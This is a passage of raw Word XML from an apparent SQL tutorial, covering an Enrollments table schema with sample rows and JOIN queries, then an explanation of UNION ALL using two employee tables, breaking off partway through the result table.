    <w:p w14:paraId="746A7E97"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This table is used to represent the many-to-many relationship between students and courses. Each student can enroll in multiple courses, and each course can have multiple students enrolled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34876077"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chema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C8794"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CREATE TABLE Enrollments (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A0425"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student_id INT,                        -- Foreign key referencing the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDCEF1"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course_id INT,                         -- Foreign key referencing the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8C2AE"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enrollment_date DATE,                  -- Date when the student enrolled in the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11397E"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grade VARCHAR(2),                      -- Grade of the student in the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D77E0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PRIMARY KEY (student_id, course_id),   -- Composite primary key to ensure a student can only be enrolled once in a course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A91B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FOREIGN KEY (student_id) REFERENCES Students(student_id),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684AB50"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FOREIGN KEY (course_id) REFERENCES Courses(course_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AACFEBE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B5A155"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ample data for the Enrollments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2"/>
        <w:gridCol w:w="947"/>
        <w:gridCol w:w="1601"/>
        <w:gridCol w:w="595"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2F164E08" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17FAF959"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tudent_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="123C790B"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course_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34FC46D5"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nrollment_date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D3616D2"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grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="441B0E40" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05BC5749"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256D3ED9"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B10CE91"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2020-01-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED1724E"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="0ADAD97B" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFE871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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B914F07"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009198F0"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2020-02-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA4D70C"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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="783B5919" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D5F4EA"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13217573"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A37859"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2019-12-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B4CB151"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17D60AD9" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="61ADAEEE">
          <v:rect id="_x0000_i3039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="096AD691"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How the Schema Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B620D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tudents Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores basic information about the students like their names, email, and contact details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0016995F"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Courses Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the information about the courses available, including course names, descriptions, durations, and the number of credits awarded upon completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E068D00"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Enrollments Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents the many-to-many relationship between students and courses. Each row in this table links a student to a course and records additional information like the enrollment date and grade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C41BE"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ample Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A531088"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1. To get all courses a student is enrolled in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE0A92"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SELECT c.course_name, c.course_description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D862BA"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FROM Courses c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12502B53"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JOIN Enrollments e ON c.course_id = e.course_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ADA02"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WHERE e.student_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA43CF"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2. To get all students enrolled in a specific course:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8482C"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SELECT s.first_name, s.last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F59003"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FROM Students s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA27644"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JOIN Enrollments e ON s.student_id = e.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FEADE"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WHERE e.course_id = 101;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C020A29"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3. To get the grade of a student in a specific course:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C93A1"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SELECT e.grade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C82B9A"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FROM Enrollments e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DA1EA"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WHERE e.student_id = 1 AND e.course_id = 101;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16796839" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00000000" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5F1CC157">
          <v:rect id="_x0000_i3040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA020DB"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C195CB4"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tudents Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Holds the student’s personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74065BD9"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Courses Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Holds the details of available courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE9AC7"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lastRenderedPageBreak/>
        <w:t>Enrollments Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Connects students with the courses they are enrolled in, while also storing additional data such as the enrollment date and grade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84A360" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="00CE4B95" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This database schema allows you to store and query student-course relationships efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827B551" w14:textId="44300AA8"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7DF1E6CC">
          <v:rect id="_x0000_i3041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF5696" w14:textId="3FC760A9" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="742" w:name="_Toc196308222"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is UNION ALL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="742"/>
    </w:p>
    <w:p w14:paraId="3647EDFB" w14:textId="48755EFD" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL in SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081974B"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UNION ALL is a SQL operation used to combine the result sets of two or more SELECT queries. It returns all rows from the combined queries, including duplicate rows. This operation does not perform any deduplication, so if there are duplicate rows in the result sets, they will be included in the final result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695DB50"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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B2EFB"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SELECT column1, column2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E162AE2"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FROM table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377F692"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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B0A0A"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SELECT column1, column2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD1B05"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FROM table2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C024C2F"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3177D9"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Returns all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: UNION ALL includes duplicate rows in the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF9254"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Faster than UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it doesn’t have to check for and remove duplicates, UNION ALL is generally faster than UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D79D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Column Matching</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The columns in each SELECT statement must have the same number and compatible data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7A7A3"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No Sorting or Distinct Check</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It does not sort the result set or remove duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6E816"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992916C"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Suppose you have two tables, Employee_US and Employee_India, and you want to combine their employee lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1B89F"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ployee_US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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="341833E8" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C74842E"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CFF9912"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A048DE"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="46D1823D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8C1B28"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFA9922"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D191C2"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3741D31F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E7E31ED"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4E5425"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FF03CF"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="734D2B91"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ployee_India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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="5F0B939F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728D5BAC"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3402DB62"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA708DA"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2B50D57C" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2B217D"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B09360"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Raj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681290FB"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="705C92CF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571AC9E4"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39C0137C"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Priya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B845DB"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India</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A790E81"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Query with UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E35B9"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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF98ED"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FROM Employee_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AA813"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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E960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SELECT emp_id, emp_name, country</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E5C10"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FROM Employee_India;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2EC3A1"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Resul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5"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="781"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="54EBD91E" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5313CDF4"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39D0FB02"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="213A4EC0"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country</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="346ABFA1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F524AB"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="358CACFB"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D4F292"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="36AD87DD" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E464F3D"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5AC980"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37F11488"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USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
